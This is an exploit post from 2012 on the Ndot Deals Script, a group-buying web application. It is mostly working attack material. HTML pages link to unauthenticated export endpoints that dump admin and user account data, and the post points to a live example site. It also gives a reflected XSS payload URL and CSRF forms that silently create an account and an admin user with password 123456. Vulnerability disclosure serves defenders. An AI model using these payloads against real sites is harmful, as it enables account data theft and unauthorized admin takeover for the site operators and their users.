facebook facebook twitter rss

Ndot Deals Script Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 11-06-2012
Ndot Deals Script Multiple Vulnerabilties
=======================================================================

#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.ndot.in/products/ndotdeals-opensource-groupon-clone
.:. Version : 3.1 , 4.2
.:. Greats To [http://exploit4arab.com/ , http://1337day.com/]
#######################################################################

===[ Exploit ]===

Version (3.1 , 4.2)
Accounts Disclosure
====================

[1] Admin Account Discloure
==============================

<html>
<head>
<title>Ndot Deals Script</title>

<div class="deals_desc1">

<div class="fr p5 mr-8">
<a href="http://SITE/site-admin/pages/export.php?type=users&format=admin&searchkey=" title="Export All">Export All</a>
</div>

</body>
</html>


[2] Users Account Disclosure
=============================

<html>
<head>
<title>Ndot Deals Script</title>

<div class="deals_desc1">

<div class="fr p5 mr-8">
<a href="http://SITE/site-admin/pages/export.php?type=users&format=general&searchkey=" title="Export All">Export All</a>
</div>

</body>
</html>

[3] All Account Discloure
============================

<html>
<head>
<title>Ndot Deals Script</title>

<div class="deals_desc1">

<div class="fr p5 mr-8">
<a href="http://SITE/site-admin/pages/export.php?type=users&format=all&searchkey=" title="Export All">Export All</a>
</div>

</body>
</html>


Example: http://www.cilecek.cz/


Version (3.1 , 4.2)
Reflected Xss
=============


https://SITE/admin/rep/referral?searchkey='"--></style></script><script>alert("XSS")</script>


Version (3.1)
Multiple CSRF
============

[1]Add Account
===============

<form method="POST" name="form0" action="http://SITE/system/affiliate/admin/manage-account.php">
<input type="hidden" name="firstname" value="Viva"/>
<input type="hidden" name="lastname" value="Palestine"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
<input type="hidden" name="taxid" value="....."/>
<input type="hidden" name="check" value="....."/>
<input type="hidden" name="level" value="0"/>
<input type="hidden" name="company" value="....."/>
<input type="hidden" name="url" value="....."/>
<input type="hidden" name="address" value="....."/>
<input type="hidden" name="zip" value="....."/>
<input type="hidden" name="city" value="....."/>
<input type="hidden" name="state" value="....."/>
<input type="hidden" name="country" value="1"/>
<input type="hidden" name="phone" value="....."/>
<input type="hidden" name="fax" value="....."/>
<input type="hidden" name="username" value="User"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="task" value="Create"/>
<input type="hidden" name="id" value=""/>
</form>
<form method="GET" name="form1" action="http://SITE/system/affiliate/admin/accounts.php?sgn=1">
<input type="hidden" name="name" value="value"/>
</form>
<form method="GET" name="form2" action="http://SITE/system/affiliate/admin/accounts.php">
<input type="hidden" name="name" value="value"/>
</form>

</body>
</html>


[2]Add Admin
============

<form method="POST" name="form0" action="http://SITE/system/affiliate/admin/manage-admin.php">
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="F.Hack@w.cn"/>
<input type="hidden" name="task" value="add"/>
<input type="hidden" name="cid[]" value="0"/>
</form>
<form method="GET" name="form1" action="http://SITE/system/affiliate/admin/admin-manager.php?sgn=1">
<input type="hidden" name="name" value="value"/>
</form>
<form method="GET" name="form2" action="http://SITE/system/affiliate/admin/admin-manager.php">
<input type="hidden" name="name" value="value"/>
</form>

</body>
</html>


#######################################################################

Like us on Facebook :